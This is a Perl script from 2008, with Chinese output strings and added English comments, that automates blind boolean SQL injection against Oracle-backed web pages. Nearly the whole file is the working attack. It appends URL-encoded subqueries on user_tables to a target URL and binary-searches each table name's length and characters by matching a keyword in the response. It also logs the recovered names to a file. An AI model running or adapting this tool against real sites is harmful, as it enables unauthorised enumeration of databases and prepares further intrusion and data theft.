oracle注入猜表名 with PERL

#!/usr/bin/perl -w

#Codz By N3tl04D
#2008-11-26



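use strict;
use warnings;   # explicit, lexically scoped equivalent of the -w on the shebang

use LWP;

# File-scoped state shared by the subs below.
my $browser;           # lazily created LWP::UserAgent, see do_GET()
my $start = time();    # wall-clock start, used for the elapsed-time report
my $p;                 # scratch scalar written by crackasc()
my $word;              # scratch scalar handed to cracklen() by the main loop

# Exactly four positional arguments are required; anything else prints the
# banner and exits.  Plain call syntax instead of `&usage` so the sub does
# not silently inherit the caller's @_.
usage() if @ARGV != 4;

my $inject      = $ARGV[0];   # injection point (URL prefix the probes are appended to)
my $key_word    = $ARGV[1];   # text expected in a "true" response; interpolated as a regex, not a literal
my $start_table = $ARGV[2];   # index of the first table to recover
my $save_path   = $ARGV[3];   # file that recovered names are appended to

info();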



# Perform one HTTP GET through the shared LWP::UserAgent, creating the agent
# on first use.  Arguments are passed straight to LWP::UserAgent::get
# (normally just the URL).
#
# List context: returns (body, status line, success flag, response object).
# Scalar context: returns the body, or nothing if the request failed.
# No timeout or retry policy is configured beyond LWP's defaults.
sub do_GET {
    $browser ||= LWP::UserAgent->new;
    my $response = $browser->get(@_);

    if (wantarray) {
        return (
            $response->content,
            $response->status_line,
            $response->is_success,
            $response,
        );
    }

    return unless $response->is_success;
    return $response->content;
}



# Length of the current table name.  File-scoped because cracklen()
# accumulates into it directly rather than using a local.
my $crack;

# Walk table indexes from the command-line start value up to a hard-coded
# upper bound of 300: first recover each name's length, then the name.
# Note that cracklen() leaves a partial value in $crack when an HTTP request
# fails, and that partial value is still passed on to crack().
for (my $table_idx = $start_table; $table_idx <= 300; $table_idx++) {
    print "正在测试第${table_idx}个表...\n";
    my $name_len = cracklen($table_idx, $word);   # second argument is ignored by cracklen()
    print "得到表长为${name_len}\n";
    crack($table_idx, $name_len);
    $crack = 0;   # reset the accumulator for the next table
}



# Binary-search the length of the Nth table name in user_tables, where N is
# the first argument (a second argument is accepted but not used).  Each
# probe asks the injection point whether length(table_name) is greater than
# the running guess and decides from whether $key_word appears in the page.
# Six probes with weights 32..1 resolve lengths 1..64.
#
# Accumulates into and returns the file-scoped $crack; the caller resets it.
# If a request fails the search stops early after a 30-second pause and the
# partial value is returned as-is.  Every probe URL is echoed to stdout.
# $key_word is interpolated into the match as a regex, so metacharacters in
# it are not treated literally.
sub cracklen {
    my ($table_idx) = @_;
    my @weights = (32, 16, 8, 4, 2, 1);
    my $step    = 0;
    my $sign    = 1;

    foreach my $weight (@weights) {
        $step++;
        $crack += $sign * $weight;
        print "大于${crack}吗?";

        my $url = $inject
            . '%20and%20(select%20%20length(table_name)%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C='
            . $table_idx
            . '%20order%20by%201%20desc)%20t%20where%20r%3E'
            . $table_idx
            . '-1%20order%20by%201)t)>'
            . $crack
            . "%20and%20'1'='1";
        print $url;

        my ($body, $status, $ok) = do_GET($url);
        if (!$ok) {
            print "网络有问题。等待30秒 $status\n";
            sleep 30;
            last;
        }

        if ($body =~ m/$key_word/) {
            $sign = 1;
            print "        Y\n";
            # Final probe answered "greater": the length is one more than the guess.
            $crack++ if $step == @weights;
        }
        else {
            $sign = -1;
            print "        N\n";
        }
    }

    return $crack;
}





# Report total wall-clock time once the table loop above has finished.
my $elapsed = time() - $start;
print "用时${elapsed}秒\n";



# Recover one table name character by character.  Arguments: the table index
# and the name length previously found by cracklen().  Each position is
# resolved by crackasc(); the assembled name is printed and appended to
# $save_path via save().  The length is used as given, so a wrong length
# (e.g. after a failed request) produces a wrong name.
sub crack {
    my ($table_idx, $name_len) = @_;
    my $name = '';

    for my $pos (1 .. $name_len) {
        print "正在测试第${pos}位字母...\n";
        my $ch = crackasc($pos, $table_idx);
        print "得到第${pos}位为$ch\n";
        $name .= $ch;
    }

    print "$name\n";
    save($table_idx, $name, $name_len);
}





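# Binary-search the ASCII code of one character of a table name via the
# injection point.  Arguments: the 1-based character position and the table
# index (Nth row of user_tables, same ordering as cracklen()).  Seven probes
# with weights 64..1 resolve codes 1..128; each asks whether
# ascii(substr(table_name, pos, 1)) is greater than the running guess and
# reads the answer from whether $key_word matches the page.
#
# Returns the recovered character (also stored in the file-scoped $p).
# On an HTTP failure it sleeps 30 seconds and returns the value 1, which the
# caller appends as if it were a real "1" -- kept for compatibility, but a
# caller cannot tell the two apart.  $key_word is used as a regex, not as a
# literal string.
sub crackasc {
    my ($char_pos, $table_idx) = @_;
    my @weights = (64, 32, 16, 8, 4, 2, 1);
    my $step    = 0;
    my $sign    = 1;
    my $guess   = 0;

    foreach my $weight (@weights) {
        $step++;
        $guess += $sign * $weight;
        print "大于${guess}吗?";

        my $url = $inject
            . '%20and%20(select%20ascii(substr(table_name,'
            . $char_pos
            . ',1))%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C='
            . $table_idx
            . '%20order%20by%201%20desc)%20t%20where%20r%3E'
            . $table_idx
            . '-1%20order%20by%201)t)>'
            . $guess
            . "%20and%20'1'='1";

        my ($body, $status, $ok) = do_GET($url);
        if (!$ok) {
            print "网络有问题。等待30秒 $status\n";
            sleep 30;
            $p = 1;   # FIXME: bogus character on transport failure, see header comment
            return $p;
        }

        if ($body =~ m/$key_word/) {
            $sign = 1;
            print "        Y\n";
            if ($step == @weights) {
                # Last probe answered "greater": the code is guess + 1.
                $p = chr($guess + 1);
                return $p;
            }
        }
        else {
            $sign = -1;
            print "        N\n";
            if ($step == @weights) {
                # Last probe answered "not greater": the code is the guess itself.
                $p = chr($guess);
                return $p;
            }
        }
    }

    return;   # unreachable: the last probe always returns above
}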







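# Append one recovered table name to $save_path (the 4th command-line
# argument).  Arguments: table index, name, name length.  Uses a 3-arg open
# on a lexical handle so the path is never parsed for a mode prefix, and
# checks close() so buffered write errors are not silently lost.  Dies with
# the OS error if the file cannot be opened or closed.
sub save {
    my ($table_idx, $name, $name_len) = @_;

    open(my $out, '>>', $save_path)
        or die("Could not open file $save_path: $!");
    print {$out} "\n第${table_idx}个表长${name_len}名$name";
    close($out)
        or die("Could not close file $save_path: $!");
}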





# Print the banner with the expected command line, then exit 0.  Called from
# the top of the script when the argument count is not exactly 4.
sub usage {
    my $banner = <<"USAGE";

  ORACLE注入辅助――猜表名

      Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path





USAGE
    print $banner;
    exit 0;
}





# Print the same banner as usage() but return instead of exiting, so the
# script continues.  Called once after the arguments have been read.
sub info {
    my $banner = <<"INFO";

  ORACLE注入辅助――猜表名

      Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path





INFO
    print $banner;
    # The original had an `exit 0` commented out here; info() deliberately
    # falls through so the table loop runs.
}
